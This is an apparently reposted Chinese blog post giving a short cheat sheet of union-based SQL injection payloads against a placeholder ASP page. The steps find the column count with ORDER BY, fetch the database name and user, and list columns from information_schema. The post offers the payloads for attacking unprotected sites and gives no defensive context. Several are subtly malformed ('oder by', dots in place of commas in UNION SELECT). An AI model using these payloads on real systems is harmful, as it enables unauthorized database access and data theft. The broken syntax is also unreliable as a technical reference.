SQL注入语法

Posted 52xuege

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入语法相关的知识,希望对你有一定的参考价值。

不考虑防护措施的情况下常规注入语句

网站http://www.xxxx.com/xxxx/1.Asp?id=1

猜字段http://www.xxxx.com/xxxx/1.Asp?id=1   oder by X        X=(1.2.3.4.5.6.....)直至网站访问正常为止。

查询数据库http://www.xxxx.com/xxxx/1.Asp?id=1   union select 1.2.3.database().5    查询数据库名

查询数据库http://www.xxxx.com/xxxx/1.Asp?id=1   union select 1.2.3.user().5    查数据库用户

查询表明http://www.xxxx.com/xxxx/1.Asp?id=1   union select 1.2.3.4.column_name from information_schema.columns where table_name = 数据表名hex值

以上是关于SQL注入语法的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入语法

安全实验室中的 SQL 注入 - 语法错误?

SQL注入语法

网络安全sql注入语法汇总

jsqlparser:实现基于SQL语法分析的SQL注入攻击检查

sql注入解析